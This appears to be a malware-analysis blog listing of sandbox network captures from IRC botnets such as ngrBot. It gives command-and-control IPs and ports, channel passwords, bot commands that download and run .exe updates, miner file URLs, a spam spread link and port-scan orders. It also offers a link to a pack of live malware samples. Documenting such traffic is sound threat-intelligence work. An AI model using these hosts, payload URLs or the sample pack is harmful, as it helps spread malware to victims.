Author: Pig

Remote Host Port Number 174.121.14.164 80 174.36.4.145 80 195.210.28.38 80 195.250.147.177 80 209.17.74.144 80 64.37.52.189 80 66.115.184.87 80 69.46.36.6 80 74.120.148.2 80 83.139.126.203 80 201.218.0.157 4244 PASS google_cache2.tmp NICK new[iRooT-XP-USA]606170 USER 4514 “” “TsGh” :4514 JOIN #!N!# WTF PRIVMSG #!N!# :http://kajmak1.bloger.hr Has Been Visited! hosting infos: http://whois.domaintools.com/201.218.0.157

Remote Host Port Number 199.101.133.30 80 199.15.234.7 80 70.38.98.238 80 216.172.132.132 1888 PASS ngrBot * The data identified by the following URLs was then requested from the remote web server: o http://dc360.4shared.com/download/A9fXfDif/gdfsdsfd534.exe o http://api.wipmania.com/ o http://img104.herosh.com/2011/10/05/270463603.gif PRIVMSG #XP :[d=”http://dc360.4shared.com/download/A9fXfDif/gdfsdsfd534.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataLdxaxl.exe” – Download retries: 0 PRIVMSG #XP :[d=”http://img104.herosh.com/2011/10/05/270463603.gif”Read more...

This package contains around 45mb malware samples (banking trojans,irc bots,rootkis etc) Download: http://adf.ly/33Qdi

Remote Host Port Number 46.17.97.83 80 46.17.97.85 80 50.58.99.143 3301 * The data identified by the following URLs was then requested from the remote web server: o http://46.17.97.83/miner/mscoree.dll o http://46.17.97.83/miner/openldap.dll o http://46.17.97.83/miner/phoenix.exe o http://46.17.97.85/miner/filelist.txt o http://46.17.97.85/miner/license.txt o http://46.17.97.85/miner/curllib.dll o http://46.17.97.85/miner/gpl-2.0.txt o http://46.17.97.85/miner/hstart.exe o http://46.17.97.85/miner/libeay32.dll o http://46.17.97.85/miner/libsasl.dll NICK [USA-XP-x86]14651 USER unreal 8 * :unreal JOIN #boatsRead more...

Remote Host Port Number 94.23.149.102 8067 NICK [LaZeR|USA|XP|nxdazw] USER pma “” “lol” :pma JOIN #lmao PONG :irc.L0yzArmy.org hosting infos: http://whois.domaintools.com/94.23.149.102

Remote Host Port Number 219.99.98.221 4244 PASS google_cache2.tmp NICK new[iRooT-XP-USA]301253 USER 3012 “” “TsGh” :3012 JOIN #!N!# WTF hosting infos: http://whois.domaintools.com/219.99.98.221

Remote Host Port Number 173.45.102.45 5794 PASS ngrBot 195.78.76.16 80 199.15.234.7 80 NICK n{US|XPa}krcsxri USER krcsxri 0 0 :krcsxri JOIN #butowski ngrBot PRIVMSG #butowski :[d=”http://www.flashgames-community.com/_server/video/1hoasdfjasdkfja.exe” s=”114698 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataTbxaxt.exe” – Download retries: 0 hosting infos: http://whois.domaintools.com/173.45.102.45

Remote Host Port Number 31.3.246.92 6667 NICK [LaZeR|USA|XP|gkisbi] USER bjrkxnykng “” “lol” :bjrkxnykng JOIN #Thanks PONG :Fbi.GoV hosting infos: http://whois.domaintools.com/31.3.246.92

x.update1001.biz DNS_TYPE_A 92.243.3.183 92.243.3.183:3327 PASS 0617 Nick: n{AT|XPa}njhaaxc Username: njhaaxc Server Pass: 0617 Joined Channel: ##up# with Password 0617 PRIVMSG ##up# :[HTTP]: Updated HTTP spread message to “hehehe! http://www.facebook.com.image331.tk/Photo-484829292.jpeg” NICK n{US|XPa}rhvfuvd USER rhvfuvd 0 0 :rhvfuvd JOIN ##up# 0617 PRIVMSG ##up# :[MSN]: Updated MSN spread interval to “3” PRIVMSG ##up# :[MSN]: Updated MSN spread messageRead more...

Remote Host Port Number 83.125.22.163 80 92.241.169.165 47221 NICK [N00_USA_XP_4629026] PRIVMSG [N00_USA_XP_4629P @ :scan; Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads. @ :scan; Random Port Scan started on 174.133.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads. MODE #ms2 -ixRead more...